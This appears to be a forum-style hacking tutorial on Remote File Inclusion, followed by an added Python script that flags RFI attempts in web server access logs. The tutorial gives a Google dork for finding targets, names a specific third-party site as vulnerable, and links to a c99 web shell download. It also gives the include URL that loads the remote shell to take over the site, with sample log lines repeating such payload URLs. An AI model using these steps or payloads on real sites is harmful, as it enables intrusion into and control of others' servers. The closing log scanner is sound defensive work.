Hack Websites by Using Remote File Inclusion (RFI)

Remote File Inclusion is one of the most common vulnerabilities found in web applications. It allows the attacker to make the web server include a file hosted on a remote server.
If the attack is successful, the attacker will gain access to the web server and can execute any command on it.

Remote File Inclusion vulnerabilities usually occur in sites which have navigation like this:



" http://www.blablabla.com/index.php?page=Anything "



To find the vulnerability the attacker will most commonly use the following Google Dork:



“ inurl:index.php?page= ” (type in google search: index.php?page=)

This will show all the pages which have “ index.php?page= ” in their URL.



This is an example of a site that is vulnerable to this kind of attack:


" http://www.cbspk.com/v2/index.php?page= "



To test whether the site is vulnerable, append http://www.google.com to the end of the URL.

So the URL is now:


" http://www.cbspk.com/v2/index.php?page=http://www.google.com "


This tests whether the site is vulnerable to this kind of attack or not.

If this does not work for the site you are trying it on, then find another site.



Now, a hacker will upload his shell to gain access to the site. The most common shell is the c99 shell. Just google it or use this link that I found:

http://www.4shared.com/file/107930574/28...ff=7637829



Now upload the file you downloaded to any web hosting site like ripway.com.



Now the hacker should load this URL to gain access:

http://www.cbspk.com/v2/index.php?page=h...l/c99.txt?


REMEMBER!!!:

Always place the question mark (?) at the end.


Now you can do what you want to do to the site!
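Seen from the server side, every request described above leaves the same trace in the access log: the page parameter carries a full URL instead of a local page name, often with a trailing question mark. The Python script below is an added example, not part of the original post, that flags such requests; the log lines, IP addresses, host names and the `ignore_params` option are constructed for illustration and assume the Apache/nginx combined log format.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# A parameter value that *starts* with a remote scheme is the RFI signature.
REMOTE_RE = re.compile(r'^\s*(https?|ftps?)://', re.IGNORECASE)

def decode(value, rounds=2):
    """URL-decode up to `rounds` times so %3A%2F%2F and %253A are both caught."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(lines, ignore_params=()):
    """Return (client, param, value, status) for each parameter holding a URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        client, target, status = m.groups()
        _, _, query = target.partition("?")  # split on the FIRST '?' only
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            value = decode(raw)
            if name not in ignore_params and REMOTE_RE.match(value):
                hits.append((client, name, value, int(status)))
    return hits

# Constructed sample log lines (documentation IP ranges and example domains).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2012:10:00:01 +0000] "GET /index.php?page=contact HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2012:10:02:11 +0000] "GET /index.php?page=http://www.example.com HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2012:10:03:40 +0000] "GET /index.php?page=http%3A%2F%2Ffiles.example.net%2Fx.txt%3F HTTP/1.1" 200 733 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2012:10:05:02 +0000] "GET /v2/index.php?page=hTTp://files.example.net/x.txt? HTTP/1.1" 404 210 "-" "curl/7.21"',
    '203.0.113.5 - - [10/Mar/2012:10:06:30 +0000] "GET /search.php?q=how+to+use+http://+links HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2012:10:07:00 +0000] "GET /out.php?url=https://www.example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Parameters that legitimately carry URLs, such as the redirect target in the last sample line, match as well; list them in `ignore_params` once they have been reviewed.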
